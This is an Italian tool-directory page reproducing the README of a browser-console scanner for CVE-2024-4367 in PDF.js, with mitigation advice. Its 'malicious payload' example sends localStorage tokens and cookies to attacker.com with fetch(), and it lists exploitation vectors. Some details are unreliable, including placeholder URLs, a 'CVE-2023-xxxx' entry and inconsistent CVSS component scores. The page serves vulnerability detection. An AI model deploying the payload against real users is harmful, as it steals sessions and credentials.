Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pdf.js-CVE-2024-4367 — Scan endpoint PoC della CVE-2024-4367 | Kitploit
Strumenti/GitHubGitHub/veronimo669/pdf.js-cve-2024-4367
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubveronimo669/pdf.js-cve-2024-4367

pdf.js-CVE-2024-4367

Scan endpoint PoC della CVE-2024-4367

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2024-4367 - Scanner universale per vulnerabilità PDF.js

⚠️ STRUMENTO DI SICUREZZA CRITICO | Rileva CVE-2024-4367 (CVSS 9.8) - Vulnerabilità di esecuzione remota di codice in PDF.js

Version CVSS CVE License

Funziona su QUALSIASI sito web - Zero configurazione richiesta


📋 Indice dei Contenuti

  • 📖 Panoramica
  • ⚡ Avvio Rapido
  • 🔍 Cosa Rileva
  • 🛠️ Come Funziona
  • 📊 Esempi di Output
  • 🔒 Guida alla Mitigazione
  • 🎯 Vettori di Sfruttamento
  • 🧪 Istruzioni di Test
  • 📝 Dettagli Tecnici
  • ⚠️ Disclaimer Legale
  • 📚 Riferimenti

📖 Panoramica

CVE-2024-4367 è una vulnerabilità critica in PDF.js (versioni < 4.2.67) che consente l'esecuzione arbitraria di JavaScript tramite file PDF dannosi. Questo scanner rileva automaticamente le istanze vulnerabili di PDF.js su QUALSIASI sito web.

Perché Questo Scanner è Diverso

  • ✅ Zero configurazione - Funziona su qualsiasi sito web all'istante
  • ✅ Rilevamento universale - Scansiona tutti i bundle JavaScript
  • ✅ Nessuna dipendenza - JavaScript puro
  • ✅ Prova di concetto - Genera un PDF di test
  • ✅ Risultati concreti - Passaggi di mitigazione chiari

La Vulnerabilità

PDF.js contiene un difetto per cui il JavaScript incorporato nei file PDF viene eseguito senza un adeguato sandboxing, consentendo agli attaccanti di:

  • 🏴‍☠️ Rubare token di autenticazione da localStorage/sessionStorage
  • 🍪 Esfiltrare cookie di sessione
  • 📁 Accedere a file locali (se app Electron/desktop)
  • 🔐 Eseguire azioni come la vittima utilizzando credenziali rubate
  • 🌐 Spostarsi verso reti interne tramite XSS

⚡ Avvio Rapido

Metodo 1: Console del Browser (Il più semplice)

  1. Apri il sito web di destinazione
  2. Premi F12 per aprire DevTools
  3. Vai alla scheda Console
  4. Incolla l'intero script dello scanner
  5. Premi Enter
  6. Visualizza i risultati visivi sullo schermo!

Metodo 2: Bookmarklet

Crea un segnalibro con questo URL:

root@kitploit:~
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();

Metodo 3: Download Diretto

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Open any website and run the script

🔍 Cosa Rileva

Fase 1: Scansione dei Bundle JavaScript

  • ✅ Rilevamento della versione di PDF.js
  • ✅ Identificazione delle versioni vulnerabili (< 4.2.67)
  • ✅ Riferimenti a Package.json
  • ✅ Percorsi Node_modules

Fase 2: Identificazione dei Visualizzatori PDF

  • ✅ Visualizzatori PDF in ``
  • ✅ Elementi <embed>
  • ✅ Tag dati <object>
  • ✅ Contenitori personalizzati per visualizzatori PDF
  • ✅ Renderer basati su canvas

Fase 3: Vettori di Sfruttamento

  • ✅ Parametri URL (?pdf=, ?file=, ?src=)
  • ✅ Moduli di caricamento PDF
  • ✅ Campi di input file che accettano .pdf
  • ✅ Endpoint API con percorsi PDF

Fase 4: Indicatori Visivi

  • ✅ Stato della vulnerabilità in tempo reale
  • ✅ PDF di prova di concetto scaricabile
  • ✅ Overlay DOM in tempo reale

🛠️ Come Funziona

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                    SCAN PROCESS FLOW                        │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 📚 LOAD SCRIPTS                                         │
│     ├─ External scripts (all <script src="">)              │
│     └─ Inline scripts (all <script> tags)                  │
│                                                             │
│  2. 🔍 EXTRACT PDF.JS VERSION                               │
│     ├─ Pattern matching in code                             │
│     ├─ Package.json detection                               │
│     └─ Node_modules path parsing                            │
│                                                             │
│  3. 🎯 IDENTIFY VULNERABILITY                               │
│     ├─ version < 4.2.67 ? → VULNERABLE                     │
│     └─ version = 2.16.105 ? → VULNERABLE                   │
│                                                             │
│  4. 🖼️ LOCATE VIEWERS                                       │
│     ├─ DOM element scanning                                 │
│     └─ Attribute detection                                 │
│                                                             │
│  5. ⚡ GENERATE POC                                         │
│     ├─ Create test PDF                                      │
│     └─ Provide download link                                │
│                                                             │
│  6. 📊 DISPLAY RESULTS                                      │
│     ├─ Visual overlay                                       │
│     ├─ Console report                                       │
│     └─ Global variable storage                              │
│                                                             │
└─────────────────────────────────────────────────────────────┘

📊 Esempi di Output

Output della Console

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CVE-2024-4367 - UNIVERSAL PDF.js SCANNER                         ║
║              Detects vulnerable PDF.js versions and potential exploitation         ║
╚═══════════════════════════════════════════════════════════════════════════════════╝

📚 PHASE 1: Scanning JavaScript Bundles for PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] Found 42 external scripts
[+] Found 12 inline scripts
   [1/42] Analyzing: vendor.bundle.js
      → PDF.js indicator found: pdfjs-dist
      ✅ PDF.js version found: 2.16.105
      🚨 VULNERABLE to CVE-2024-4367!

🎯 PHASE 4: Identifying Exploitation Vectors
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⚠️ URL parameter accepts PDF: file=/documents/report.pdf
   ⚠️ PDF upload form found

█████████████████████████████████████████████████████████████████████████████████
                          FINAL SCAN REPORT
█████████████████████████████████████████████████████████████████████████████████

🚨 CRITICAL VULNERABILITY CONFIRMED!
   CVE: CVE-2024-4367
   CVSS: 9.8 (CRITICAL)
   Impact: Arbitrary JavaScript Execution

Overlay Visivo

Overlay dello Scanner

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  CVE-2024-4367 SCAN RESULTS                                │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  📍 Target: example.com                                    │
│  📦 PDF.js: 2.16.105                                       │
│  🎯 Vulnerable: YES                                        │
│  📄 Viewers: 3                                             │
│  ⚡ Vectors: 2                                             │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  🔴 CRITICAL - Upgrade Required                            │
└─────────────────────────────────────────────────────────────┘

🔒 Guida alla Mitigazione

Azioni Immediate

1. Aggiorna PDF.js (Consigliato)

root@kitploit:~
# For Node.js projects
npm install pdfjs-dist@latest

# For CDN usage
# Update to version 4.2.67 or higher

2. Disabilita l'Esecuzione di JavaScript

root@kitploit:~
// Set this before loading PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;

3. Content Security Policy

root@kitploit:~
Content-Security-Policy: script-src 'self'; 
                        object-src 'none'; 
                        worker-src 'none'

4. Validazione dell'Input

root@kitploit:~
// Validate PDF files before rendering
function validatePDF(file) {
    // Check magic bytes
    const header = file.slice(0, 5);
    if (header !== '%PDF-') {
        throw new Error('Invalid PDF file');
    }
    
    // Scan for JavaScript
    const text = file.toString();
    if (text.includes('/JavaScript') || 
        text.includes('/JS') ||
        text.includes('<< /S /JavaScript >>')) {
        throw new Error('PDF contains JavaScript');
    }
}

Soluzioni a Lungo Termine


🎯 Vettori di Sfruttamento

Vettori Comuni Rilevati

  1. Parametri URL

    root@kitploit:~
    /viewer?file=malicious.pdf
    /download?pdf=malicious.pdf
    
  2. Caricamento File

    root@kitploit:~
    <input type="file" accept=".pdf">
    
  3. Visualizzatori Incorporati

    root@kitploit:~
    
    <embed src="malicious.pdf">
    
  4. Endpoint API

    root@kitploit:~
    /api/documents/123/download
    /api/report/pdf
    

Esempio di Payload Dannoso

root@kitploit:~
// PDF embedded JavaScript
this.alert('CVE-2024-4367 Exploited!');
fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        token: localStorage.getItem('token'),
        cookies: document.cookie
    })
});

🧪 Istruzioni di Test

Test Passo dopo Passo

  1. Installa lo scanner

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-4367-Scanner
    
  2. Esegui lo scanner

    root@kitploit:~
    # Open the target website
    # Paste the scanner in console
    # Or use the bookmarklet
    
  3. Analizza i risultati

    • Cerca lo stato "VULNERABLE"
    • Annota la versione di PDF.js
    • Controlla i vettori di sfruttamento
  4. Scarica il PDF di prova di concetto (se vulnerabile)

    • Fai clic sul pulsante di download
    • Carica/apri il PDF
    • Osserva l'esecuzione di JavaScript
  5. Applica le correzioni

    • Aggiorna PDF.js
    • Implementa CSP
    • Valida gli input

Risultati Attesi

ScenarioRisultato
PDF.js 2.16.105🔴 CRITICAL
PDF.js 3.x🔴 VULNERABLE
PDF.js 4.0.x🔴 VULNERABLE
PDF.js 4.2.67+

📝 Dettagli Tecnici

Controllo della Versione

root@kitploit:~
// Vulnerable versions
const VULNERABLE_VERSIONS = [
    { version: '2.16.105', status: 'CRITICAL' },
    { version: '3.x.x', status: 'CRITICAL' },
    { version: '4.0.x - 4.2.66', status: 'CRITICAL' }
];

// Safe version
const SAFE_VERSION = '4.2.67';

Cronologia della Vulnerabilità

DataEvento
2024-04-23Vulnerabilità scoperta
2024-04-24Assegnato CVE-2024-4367
2024-04-25Patch rilasciata (4.2.67)

Analisi del Punteggio CVSS


⚠️ Disclaimer Legale

IMPORTANTE: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi.

  • ✅ FAI utilizzarlo sui tuoi siti web
  • ✅ FAI utilizzarlo con permesso esplicito
  • ✅ FAI utilizzarlo per la ricerca sulla sicurezza
  • ❌ NON utilizzarlo su sistemi non autorizzati
  • ❌ NON utilizzarlo per scopi dannosi

Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo strumento.


📚 Riferimenti

Risorse Ufficiali

  • CVE-2024-4367 - NIST NVD
  • Avviso di sicurezza PDF.js
  • Blog sulla sicurezza di Mozilla

Vulnerabilità Correlate

  • CVE-2024-4367 - RCE in PDF.js
  • CVE-2023-xxxx - Problemi precedenti di PDF.js
  • XSS tramite PDF.js nelle applicazioni web

Strumenti e Risorse

  • Repository ufficiale di PDF.js
  • Prevenzione XSS di OWASP
  • Riferimento CSP

Articoli di Ricerca

  • Analisi della sicurezza di PDF.js
  • Rischi del rendering PDF lato client

🤝 Contributi

I contributi sono benvenuti! Per favore:

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità
  3. Invia una pull request
  4. Segui lo stile del codice

Configurazione di Sviluppo

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Make your changes
# Test on multiple websites
# Submit PR

📄 Licenza

Questo progetto è distribuito sotto la licenza MIT - consulta il file LICENSE per i dettagli.


🌟 Supporto

Se trovi utile questo strumento:

  • ⭐ Metti una stella al repository
  • 🐛 Segnala problemi
  • 📝 Scrivi documentazione
  • 🔧 Invia correzioni

🛡️ Resta al Sicuro. Testa Presto. Testa Spesso.

Creato con ❤️ dalla comunità della sicurezza

Segnala un Problema • Metti una Stella su GitHub • Leggi la Documentazione

Scarica lo strumento
SoluzioneDifficoltàEfficacia
Aggiornare PDF.jsFacile✅ Correzione completa
Disabilitare JS in PDF.jsFacile✅ Correzione completa
Implementazione CSPMedia✅ Buona
Validazione lato serverMedia✅ Buona
Rendering in sandboxDifficile✅ Eccellente
✅ SAFE
Nessun PDF.jsℹ️ SAFE
2024-04-26Divulgazione pubblica
2024-05-01Osservati tentativi di sfruttamento
ComponentePunteggio
Vettore di attaccoNetwork (9.8)
Complessità dell'attaccoLow (9.8)
Privilegi richiestiNone (9.8)
Interazione dell'utenteRequired (8.8)
ScopeChanged (9.1)
RiservatezzaHigh (9.8)
IntegritàHigh (9.8)
DisponibilitàHigh (9.8)
Totale9.8 (CRITICAL)